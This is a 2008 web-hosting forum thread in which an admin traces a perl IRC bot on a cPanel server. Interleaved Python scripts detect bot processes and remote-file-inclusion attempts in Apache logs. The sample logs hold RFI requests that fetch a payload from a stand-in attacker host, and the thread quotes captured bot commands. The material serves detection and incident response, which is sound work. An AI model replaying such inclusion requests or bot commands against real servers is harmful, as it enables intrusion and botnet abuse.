From odd 'nobody' process to unusual and malicious IRC traffic

Discussion in 'General Discussion' started by jasonb3t, May 29, 2008.

  1. jasonb3t

    jasonb3t Member

    May 29, 2008
    We discovered an odd process on our cPanel server, launched from /usr/sbin/sshd, but running under the name "perl" as the user "nobody." It was taking up a lot of CPU time.

    Doing an "lsof | grep <PID number>," I found it would periodically open lots of Apache logs, attempt to start listeners on ports 80 and 443, and launch an IRC connection out to

    I started up a packet sniffer to see what the IRC traffic was about and I got this conversation (abc! is evidently our box responding to queries as an IRC bot):
    :AnGeL! PRIVMSG #udp :!ssh 22
    :AnGeL! PRIVMSG #udp :!ssh 80
    :_secure! PRIVMSG #udp :!dns
    :abc! PRIVMSG #udp :.4Unable to resolve .. .
    :abc! PRIVMSG #udp :Conexiunea la (22) e in TIME OUT.   [Romanian: "The connection to (22) has timed out."]
    :abc! PRIVMSG #udp :Conexiunea la (80) e in TIME OUT.   [Romanian: "The connection to (80) has timed out."]
    :_secure! PRIVMSG #udp :.ACTION of.
    :_secure! PRIVMSG #udp :.ACTION @ somn.
    :AnGeL! PRIVMSG #udp :!ssh 53
    :abc! PRIVMSG #udp :Conexiunea la (53) este acceptata!   [Romanian: "The connection to (53) is accepted!"]
    After seeing that traffic, we had enough and did a "kill -9" to get rid of the process.

    Now we're seeing a process that is supposedly part of cPanel trying to connect to a myriad of IRC servers:
    # lsof -i | grep ircd
    chkservd   2327   nobody    0u  IPv4 935805051       TCP> (SYN_SENT)
    chkservd   2327   nobody    1u  IPv4 877984138       TCP ***ourIP***:47008-> (ESTABLISHED)
    chkservd   2327   nobody    2u  IPv4 877708484       TCP ***ourIP***:44069-> (ESTABLISHED)
    chkservd   2327   nobody  396u  IPv4 877852377       TCP ***ourIP***:45815-> (ESTABLISHED)
    chkservd   2327   nobody  398u  IPv4 877704785       TCP ***ourIP***:43997-> (ESTABLISHED)
    chkservd   2327   nobody  399u  IPv4 877719170       TCP ***another_of_ourIPs***:44211-> (ESTABLISHED)
    chkservd   2327   nobody  400u  IPv4 877714142       TCP ***ourIP***:44119-> (ESTABLISHED)
    chkservd   2327   nobody  401u  IPv4 877730070       TCP ***yet another_of_ourIPs***:44289-> (ESTABLISHED)
    There are several IP addresses configured on the server and these connection attempts are actually being made from different ones--not just the default.

    I've run rootkit finders and some clamscans and I've come up with nothing. chkservd is not configured for any IRC services. Any ideas, gentlemen?
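The two artefacts in the post above (the sniffed IRC conversation and the lsof listing) can be triaged mechanically. The following is an added example, not code from the original post or from cPanel: it parses lsof -i rows and raw PRIVMSG lines, separates the controlling nicks from the answering bot, and flags the three things that stand out in the listing: a daemon name owned by the wrong account, outbound connections from the web user to IRC ports, and one PID binding sockets from several of the server's IPs. The sample rows are constructed (RFC 5737 addresses stand in for the redacted hosts), and the expected-owner table and IRC port list are assumptions for this box.

```python
import re
from collections import defaultdict

# Which daemons may own sockets under which account. Assumption for this
# example: on a cPanel box chkservd and sshd run as root, so a 'chkservd'
# owned by nobody is a process that merely renamed itself.
EXPECTED_OWNER = {"chkservd": {"root"}, "sshd": {"root"}}
IRC_PORTS = set(range(6660, 6670)) | {7000}   # common IRC service ports (assumption)

# 'lsof -i' row: COMMAND PID USER FD TYPE DEVICE [SIZE/OFF] NODE NAME [(STATE)]
# SIZE/OFF is absent in the listing above, so it is optional here.
LSOF_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+IPv[46]\s+\S+\s+"
    r"(?:\S+\s+)?(?:TCP|UDP)\s+(?P<local>\S+?)(?:->(?P<remote>\S+))?"
    r"(?:\s+\((?P<state>[A-Z_]+)\))?$"
)
# PRIVMSG as seen on the wire. The user@host part after '!' was redacted in
# the capture above, so it is allowed to be empty.
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!\S*\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)
BOT_CMD_RE = re.compile(r"^!(?P<cmd>[a-z]+)(?:\s+(?P<args>.*))?$", re.I)

# Constructed sample data modelled on the post (hosts are placeholders).
SAMPLE_IRC = """\
:AnGeL! PRIVMSG #udp :!ssh 22
:AnGeL! PRIVMSG #udp :!ssh 80
:_secure! PRIVMSG #udp :!dns
:abc! PRIVMSG #udp :Conexiunea la (22) e in TIME OUT.
:AnGeL! PRIVMSG #udp :!ssh 53
:abc! PRIVMSG #udp :Conexiunea la (53) este acceptata!
""".splitlines()

SAMPLE_LSOF = """\
chkservd   2327   nobody    0u  IPv4 935805051       TCP 192.0.2.10:44001->198.51.100.9:6667 (SYN_SENT)
chkservd   2327   nobody    1u  IPv4 877984138       TCP 192.0.2.10:47008->198.51.100.5:6667 (ESTABLISHED)
chkservd   2327   nobody  399u  IPv4 877719170       TCP 192.0.2.11:44211->203.0.113.7:6667 (ESTABLISHED)
httpd      1810   nobody   12u  IPv4 877700001       TCP 192.0.2.10:80->203.0.113.20:51234 (ESTABLISHED)
sshd        911     root    3u  IPv4 877700002       TCP 192.0.2.10:22->203.0.113.21:40000 (ESTABLISHED)
""".splitlines()


def parse_lsof(lines):
    """Return one dict per parseable 'lsof -i' row."""
    rows = []
    for line in lines:
        m = LSOF_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["pid"] = int(row["pid"])
            rows.append(row)
    return rows


def remote_port(addr):
    try:
        return int(addr.rsplit(":", 1)[1])
    except (AttributeError, IndexError, ValueError):
        return None


def socket_findings(rows):
    """Unique, sorted list of reasons the socket table looks wrong."""
    found = set()
    local_ips = defaultdict(set)
    for r in rows:
        pid, cmd, user = r["pid"], r["cmd"], r["user"]
        allowed = EXPECTED_OWNER.get(cmd)
        if allowed is not None and user not in allowed:
            found.add(f"pid {pid}: '{cmd}' runs as {user}, expected {'/'.join(sorted(allowed))}")
        if user == "nobody" and remote_port(r["remote"]) in IRC_PORTS:
            found.add(f"pid {pid}: {user} -> {r['remote']} ({r.get('state') or '?'}) looks like IRC")
        if ":" in r["local"]:
            local_ips[pid].add(r["local"].rsplit(":", 1)[0])
    for pid, ips in local_ips.items():
        if len(ips) > 1:   # one process using several of the server's addresses
            found.add(f"pid {pid}: sockets bound from {len(ips)} different local IPs {sorted(ips)}")
    return sorted(found)


def parse_privmsgs(lines):
    return [m.groupdict() for m in map(PRIVMSG_RE.match, (l.strip() for l in lines)) if m]


def bot_commands(msgs):
    """(issuing nick, command, args) for every '!cmd' seen in the channel."""
    out = []
    for m in msgs:
        c = BOT_CMD_RE.match(m["text"])
        if c:
            out.append((m["nick"], c["cmd"].lower(), (c["args"] or "").strip()))
    return out


def controllers_and_bots(msgs):
    """Nicks that issue commands are the operators; everyone else answering is a bot."""
    controllers = {nick for nick, _, _ in bot_commands(msgs)}
    bots = {m["nick"] for m in msgs if m["nick"] not in controllers}
    return sorted(controllers), sorted(bots)


if __name__ == "__main__":
    print(controllers_and_bots(parse_privmsgs(SAMPLE_IRC)))
    for line in socket_findings(parse_lsof(SAMPLE_LSOF)):
        print(line)
```

Run it against real output by feeding `lsof -i -n -P` (numeric hosts and ports, so the regex sees addresses rather than names) and the PRIVMSG lines from the sniffer. The name-versus-owner check is the quickest tell here: lsof's COMMAND column comes from the process's own name, which the bot can set to anything, while the owning user cannot be faked without a privilege escalation.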
  2. ramprage

    ramprage Well-Known Member

    Jul 21, 2002
    This looks like a perl IRC bot which usually gets uploaded to a user's web space and run remotely. Virus scanners won't pick that type of thing up since it's not a virus. Upload Guardian will.

    Also having Nobody Check installed is a good idea to keep an eye on your nobody/web user processes.
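The "keep an eye on your nobody processes" advice above is easy to automate from /proc. The following is an added example written for this thread, not the Nobody Check script the reply refers to and not cPanel code: it lists every process owned by the web user and reports the ones that do not look like Apache children. The web user name, the Apache parent names, the interpreter list and the scratch directories are assumptions for a typical cPanel box; the classifier is separated from the /proc reader so it can be exercised on constructed process records.

```python
import os
import pwd

WEB_USER = "nobody"                                   # Apache/PHP user (assumption)
APACHE_PARENTS = {"httpd", "httpd2", "apache2"}        # legitimate parents of a web-user process
INTERPRETERS = {"perl", "python", "python2", "python3", "php", "sh", "bash"}
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def classify(info):
    """Return the reasons a web-user process looks wrong (empty list = normal).

    info: dict with comm, exe, cwd, cmdline (list), ppid, parent_comm as read from /proc.
    """
    reasons = []
    exe = info["exe"]
    if exe.endswith(" (deleted)"):                    # binary unlinked after it started
        exe = exe[: -len(" (deleted)")]
        reasons.append("executable was deleted from disk")
    exe_base = os.path.basename(exe)
    # A bot can rename itself (argv[0] or prctl) so ps and lsof show 'chkservd',
    # but /proc/PID/exe still points at the interpreter that is really running.
    argv0 = os.path.basename(info["cmdline"][0]) if info["cmdline"] else ""
    for shown in {info["comm"], argv0}:
        if shown and shown not in (exe_base, exe_base[:15]):   # comm is truncated to 15 chars
            reasons.append(f"shows as '{shown}' but the executable is {exe}")
    if exe_base in INTERPRETERS:
        reasons.append(f"{exe_base} interpreter running as {WEB_USER}")
    if info["cwd"].startswith(SCRATCH_DIRS) or "/public_html" in info["cwd"]:
        reasons.append(f"working directory {info['cwd']} is scratch space or web space")
    # Apache children hang off the httpd master; a web-user process parented by
    # init (pid 1) or anything else has detached itself.
    if info["ppid"] == 1 or info["parent_comm"] not in APACHE_PARENTS:
        reasons.append(f"parent is '{info['parent_comm']}' (pid {info['ppid']}), not the Apache master")
    return reasons


def _read(path):
    with open(path) as fh:
        return fh.read()


def _comm(pid):
    try:
        return _read(f"/proc/{pid}/comm").strip()
    except OSError:
        return "?"


def web_user_processes():
    """Yield one info dict per live process owned by WEB_USER (run as root to read exe/cwd)."""
    uid = pwd.getpwnam(WEB_USER).pw_uid
    for pid in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{pid}"
        try:
            if os.stat(base).st_uid != uid:
                continue
            stat = _read(f"{base}/stat")
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])   # field after state
            with open(f"{base}/cmdline", "rb") as fh:
                cmdline = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
            yield {
                "pid": int(pid), "comm": _read(f"{base}/comm").strip(),
                "exe": os.readlink(f"{base}/exe"), "cwd": os.readlink(f"{base}/cwd"),
                "cmdline": cmdline, "ppid": ppid, "parent_comm": _comm(ppid),
            }
        except OSError:
            continue          # process exited meanwhile, or /proc entry unreadable


if __name__ == "__main__":
    for info in web_user_processes():
        for why in classify(info):
            print(f"{info['pid']:>6} {info['comm']:<15} {why}")
```

Run it from cron and mail any output; a healthy mod_php box prints nothing. It reads /proc/PID/exe and cwd, which need root, and it will not see a process that hides itself with a kernel rootkit, so it complements rather than replaces the rootkit scanners mentioned in the first post.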
  3. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    May 28, 2005
    Buddy, you are another victim of the shell-bot kiddies.
    This may have happened because one of your customers has a vulnerable site with a remote file inclusion bug.

    One good idea is to activate mod_security or Snort inline to prevent these intrusions.

    If you are infected with these perl bots, your box will be available to be used like a gun against any target, shooting a lot of Gbps at someone.

    The use of a very good IDS, constantly updated, is one of the best practices, I think, to prevent this kind of trouble.

    Best Regards
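If remote file inclusion is the suspected entry point, the Apache access logs (which the bot itself was reading, per the first post) usually show the request that pulled the bot in. The following is an added example for this thread, not code from the original posts or from cPanel or mod_security: it scans combined-format log lines for a query parameter whose value is itself a URL, percent-decoded first so `http%3A%2F%2F` is caught too, and then keeps the hits whose URL looks like an include payload. The log lines are constructed and the hostnames are placeholders; the payload-name pattern is an assumption.

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat: host ident user [time] "request" status bytes "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# RFI signature: a parameter whose value is a URL, e.g. /index.php?page=http://evil.example/bot.txt?
RFI_RE = re.compile(r"[?&]([^=&]+)=((?:https?|ftp)://[^&\s]+)", re.I)
# Typical payload names (assumption); the trailing '?' turns whatever the
# vulnerable script appends (".php", "/header.inc") into a query string.
PAYLOAD_RE = re.compile(r"\.(?:txt|php|pl|gif|jpg)\?$|\.(?:txt|pl)$", re.I)

# Constructed sample: two attempts (plain and percent-encoded) from one host,
# one normal page view, and an open-redirect style parameter that is not RFI.
SAMPLE_LOG = [
    '203.0.113.9 - - [29/May/2008:03:12:44 -0500] "GET /index.php?page=http://evil.example/bot.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [29/May/2008:03:12:45 -0500] "GET /index.php?page=http%3A%2F%2Fevil.example%2Fbot.txt%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '198.51.100.4 - - [29/May/2008:03:13:01 -0500] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [29/May/2008:03:13:05 -0500] "GET /login.php?next=https://www.example.com/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def rfi_attempts(lines):
    """Every request carrying a URL-valued parameter, with the script it targeted."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        uri = unquote(m["uri"])                       # decode %3A%2F%2F etc. before matching
        for param, url in RFI_RE.findall(uri):
            hits.append({
                "ip": m["ip"], "ts": m["ts"], "script": uri.split("?", 1)[0],
                "param": param, "url": url, "status": int(m["status"]), "ua": m["ua"],
            })
    return hits


def likely_rfi(hits):
    """Drop redirect-style parameters; keep URLs that look like fetched payloads."""
    return [h for h in hits if PAYLOAD_RE.search(h["url"])]


def by_source(hits):
    """Group suspicious requests per client address, oldest first."""
    grouped = {}
    for h in hits:
        grouped.setdefault(h["ip"], []).append(h)
    return grouped


if __name__ == "__main__":
    for ip, reqs in by_source(likely_rfi(rfi_attempts(SAMPLE_LOG))).items():
        for r in reqs:
            print(f"{ip} {r['ts']} {r['script']} {r['param']}={r['url']} -> {r['status']} ({r['ua']})")
```

Point it at every vhost's access_log under /usr/local/apache/domlogs (on a cPanel box) to find the script that was abused and the account it belongs to; a 200 response to such a request means the include most likely succeeded. Expect some benign hits from redirect or callback parameters, which is why the payload filter is a separate step and can be tuned.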
